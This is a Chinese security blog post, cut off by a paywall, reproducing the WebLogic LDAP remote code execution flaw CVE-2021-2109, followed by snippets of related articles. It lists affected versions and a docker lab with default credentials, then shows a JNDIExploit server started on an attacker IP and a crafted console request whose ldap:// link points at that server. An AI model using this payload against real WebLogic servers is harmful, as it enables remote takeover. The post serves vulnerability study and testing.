Weblogic LDAP 远程代码执行漏洞(CVE-2021-2109)

最新推荐文章于 2026-03-29 10:17:41 发布
原创 最新推荐文章于 2026-03-29 10:17:41 发布 · 1.4k 阅读 · 1
标签
#weblogic #docker

CVE-2021-2109 Weblogic Server远程代码执行漏洞

影响范围

WebLogic Server 10.3.6.0.0
WebLogic Server 12.1.3.0.0
WebLogic Server 12.2.1.3.0
WebLogic Server 12.2.1.4.0
WebLogic Server 14.1.1.0.0

环境搭建

这个怎么搭都行,推荐采用docker镜像,例如以下两个docker镜像

  • 采用vulhub/weblogic/CVE-2020-14882的镜像(WebLogic Server 版本: 12.2.1.3.0)
  • 采用ismaleiva90/weblogic12镜像(WebLogic Server 版本: 12.1.3.0.0)
    (docker run -d -p 49163:7001 -p 49164:7002 -p 49165:5556 ismaleiva90/weblogic12:latest)
    (User: weblogic Pass: welcome1)

手动搭建环境的话注意weblogic环境的JDK版本,需低于下图所示的版本(JDK 6u201、7u191、8u182、11.0.1版本或以上不受此漏洞的影响):
JDK版本

复现(两种方法)

方法一、需登录Weblogic控制台

1. 启动 LDAP服务+HTTP服务
root@dream2:/root/JNDIExploit # java -jar JNDIExploit-v1.11.jar -i 158.247.x.x
[+] LDAP Server Start Listening on 1389...
[+] HTTP Server Start Listening on 8080...
2. 上POC:(抓取登陆时的数据包修改ldap链接)
POST /console/consolejndi.portal?_pageLabel=JNDIBindingPageGeneral&_nfpb=true&JNDIBindingPortlethandle=com.bea.console.handles.JndiBindingHandle(%22ldap://158.247.x;x:1389/Basic/WeblogicEcho;AdminServer%22) HTTP/1.1
Host: 139.180.x.x:49163
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 1
最低0.47元/天 解锁文章
复现CVE-2021-2109 (Weblogic Server远程代码执行漏洞)
记录并分享学习安全的知识点..
01-19 4558
一、漏洞介绍 2021年1月20日,Oracle官方发布了漏洞补丁,修了包括 CVE-2021-2109 Weblogic Server远程代码执行漏洞在内的多个高危严重漏洞CVE-2021-2109 中,攻击者可构造恶意请求,造成JNDI注入,执行任意代码,从而控制服务器。 二、影响版本 WebLogic 3.6.0.0 WebLogic 1.3.0.0 WebLogic 2.1.3.0 WebLogic 2.1.4.0 漏洞判别方式:http://x.x.x.x:7001/conso
Weblogic Server远程代码执行漏洞CVE-2021-2109 )复现
渗透之路,攻防之间皆学问
03-03 8067
目录 一. 漏洞描述 二. 影响版本 三. 测试环境搭建 四. 漏洞复现 1. 远程命令执行 2. 反弹shell 五. 漏洞修复 六. 漏洞检测POC 一. 漏洞描述 WebLogic是美国Oracle公司出品的一个application server,确切的说是一个基于JAVAEE架构的中间件,WebLogic是用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器。将Java的动态功能和Java Enterprise标准的安全性引入大型网络应.
CVE-2021-2109 Weblogic Server远程代码执行漏洞
m0_56642842的博客
06-24 3486
0x00 简介 WebLogic是美国甲骨文公司出品的一个application server(应用服务器),确切的说是一个基于JAVAEE架构的中间件,WebLogic主要用于开发、继承、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器。 0x01 漏洞概述 CVE-2021-2109是存在于WebLogic Server的console中的一个远程代码执行漏洞,经过身份验证的攻击者可以直接通过JNDI远程执行命令或者注入代码,可以配合CVE-2020-14882未授权漏洞执行任意
CVE-2021-21972到虚拟机取证:一次完整的vCenter渗透测试实战复盘(含工具链)
最新发布
weixin_29300241的博客
03-29 181
本文详细解析了从CVE-2021-21972漏洞利用到虚拟机取证的完整vCenter渗透测试实战过程。通过漏洞利用、后渗透技术及虚拟机取证三个关键阶段,展示了攻击者如何突破vCenter防线并获取敏感数据,同时提供了针对性的防御建议和检测指标,帮助安全团队构建更全面的虚拟化环境防护体系。
CVE漏洞复现-CVE-2021-2109 Weblogic Server远程代码执行
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
06-06 1784
2021年1月20日,Oracle官方发布了漏洞补丁,修了包括 CVE-2021-2109Server远程代码执行漏洞在内的多个高危严重漏洞CVE-2021-2109 中,攻击者可构造恶意请求,造成JNDI注入,执行任意代码,从而控制服务器。该漏洞Weblogic远程代码执行漏洞,主要由JNDI注入,导致攻击者可利用此漏洞远程代码执行,危险等级高。
CVE-2021-2109 WebLogic JNDI 注入
蚁景网安学院
03-02 740
0x01 前言学习一下 WebLogic JNDI 注入 RCE(CVE-2021-2109)0x02 环境搭建和之前 WebLogic 的环境搭建是一致的,本文不再赘述。不过值得一提的是,我的 weblogic 版本是 10.3.6;需要手动添加\server\lib\consoleapp\webapp\WEB-INF\lib\console.jar到依赖里面0x03 漏洞分析与复现漏洞影响...
WebLogic LDAP远程代码执行漏洞CVE-2021-2109
千寻的博客
02-11 4719
漏洞名称 WebLogic LDAP远程代码执行漏洞 漏洞编号 CVE-2021-2109 JNDI简介 JNDI是Java Naming and Directory Interface (Java命名和目录接口)的英文简写, 是为Java应用程序提供命名和目录访问服务的API (application programing interface,应用程序编程接口)。 漏洞描述 2020年11月19日,阿里云安全向Oracle官方报告了Weblogic Server远程代码执行漏洞
Weblogic LDAP 远程代码执行漏洞 CVE-2021-2109
PeiQi的博客
01-22 3797
Weblogic LDAP 远程代码执行漏洞 CVE-2021-2109 漏洞描述 2021年1月20日,绿盟科技监测发现Oracle官方发布了2021年1月关键补丁更新公告CPU(Critical Patch Update),共修复了329个不同程度的漏洞,其中包括7个影响WebLogic的严重漏洞CVE-2021-1994、CVE-2021-2047、CVE-2021-2064、CVE-2021-2108、CVE-2021-2075、CVE-2019-17195、CVE-2020-14756),未经身
Weblogic LDAP 远程代码执行漏洞复现【CVE-2021-2109
ximo的博客
04-29 1076
漏洞概述 Oracle官方发布了2021年1月关键补丁更新公告CPU(Critical Patch Update),共修复了329个不同程度的漏洞,其中包括7个影响WebLogic的严重漏洞CVE-2021-1994、CVE-2021-2047、CVE-2021-2064、CVE-2021-2108、CVE-2021-2075、CVE-2019-17195、CVE-2020-14756),未经身份验证的攻击者可通过此次的漏洞实现远程代码执行。 影响范围 WebLogic Server 10.3.6.0.0
LDAP未授权漏洞验证
热门推荐
qq_45300786的博客
08-18 1万+
因为工作需要,这里验证了下LDAP未授权。 以下是收集到的资料,最后是具体使用!!!!! ldap安装 https://www.cnblogs.com/xiaozi/p/8276962.html 一、LDAP未授权访问漏洞-验证。 LDAP未授权访问漏洞-验证 nmap的一些脚本使用 Nmap 使用 nmap脚本使用总结 nmap脚本的官方文档 https://nmap.org/nsedoc/scripts/ldap-brute.html 对于NOVELL LDAP 轻量级目录服务的学习理解 https:
LDAPLDAP 未授权访问漏洞修复方案
Mrerlou的博客
12-12 8028
最近生产环境中,被安全团队扫描到了 LDAP服务存在未授权访问漏洞。这里记录下如何解决。
Ldap未授权漏洞验证
qll71的博客
08-12 1120
内网渗透用nuclei(nuclei.exe -l ip.txt -stats -c 50 -timeout 60 -o xxxx.txt)扫出来ldap未授权,进行复现。
WebLogic_LDAP远程代码执行(CVE-2021-2109)
Longwaer
01-15 1300
学习了解掌握WebLogic_LDAP远程命令执行,更快的知晓中间件的漏洞利用方式及原理。
CVE-2024-21006-weblogic远程命令执行漏洞
zwy15288408160的博客
04-25 7467
Oracle WebLogic Server 存在远程命令执行漏洞CVE-2024-21006),该漏洞源于T3/IIOP协议存在缺陷,未经身份验证的攻击者可通过T3/IIOP协议受影响的服务器发送恶意的请求,利用LDAP工具执行任意代码。
WEBLOGIC LDAP 详解
weixin_33691700的博客
12-13 723
事情是这样的,我们公司的规范是admin实例上不能部署应用,但是现在有个二期的项目,原来应用就是部署在admin实例上的,现在为了省事(少该代码的配置),还想部署在admin实例上,按理说其实也没什么问题。但是今天在新建weblogic deployer权限用户时,问题来了。在控制台新建一个用户后,重启admin实例,之后再从控制台看这个用户就没了。找了半天问题,什么补丁啊等等,最后发现是缓...
CVE-2021-2109Weblogic Server远程代码执行漏洞验证及修复
weixin_38896449的博客
03-25 2292
weblogic 未授权命令执行漏洞CVE-2020-148821.漏洞描述2.影响版本3.漏洞检测4.漏洞修复 1.漏洞描述 2021年1月20日,Oracle官方发布了2021年1月关键补丁更新公告CPU(Critical Patch Update),CVE-2021-2109 Weblogic Server远程代码执行漏洞在内的多个高危严重漏洞。在CVE-2021-2109漏洞中,攻击者可构造恶意请求,造成JNDI注入、执行任意代码,从而控制服务器。 2.影响版本 Weblogic Server 10
weblogic LDAP远程代码执行 CVE-2021-2109
课嗨教育的专栏
02-01 2389
漏洞影响版本 WebLogic Server 10.3.6.0.0 WebLogic Server 12.1.3.0.0 WebLogic Server 12.2.1.3.0 WebLogic Server 12.2.1.4.0 WebLogic Server 14.1.1.0.0 漏洞复现 搭建实验环境,我这里直接使用vulhub里weblogic CVE-2020-14882的环境 访问http://192.168.2.131:7001,出现以下界面说明搭建成功 访问以下路径,如果
三十种未授权访问漏洞复现 合集( 一 )
qq_48368964的博客
08-03 2911
开启MongoDB服务时不添加任何参数时,默认是没有权限验证的,登录的用户可以通过默认端口无需密码对数据库任意操作(增、删、改、查高危动作)而且可以远程访问数据库。造成未授权访问的根本原因就在于启动 Mongodb 的时候未设置 –auth 也很少会有人会给数据库添加上账号密码(默认空口令),使用默认空口令这将导致恶意攻击者无需进行账号认证就可以登陆到数据服务器。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值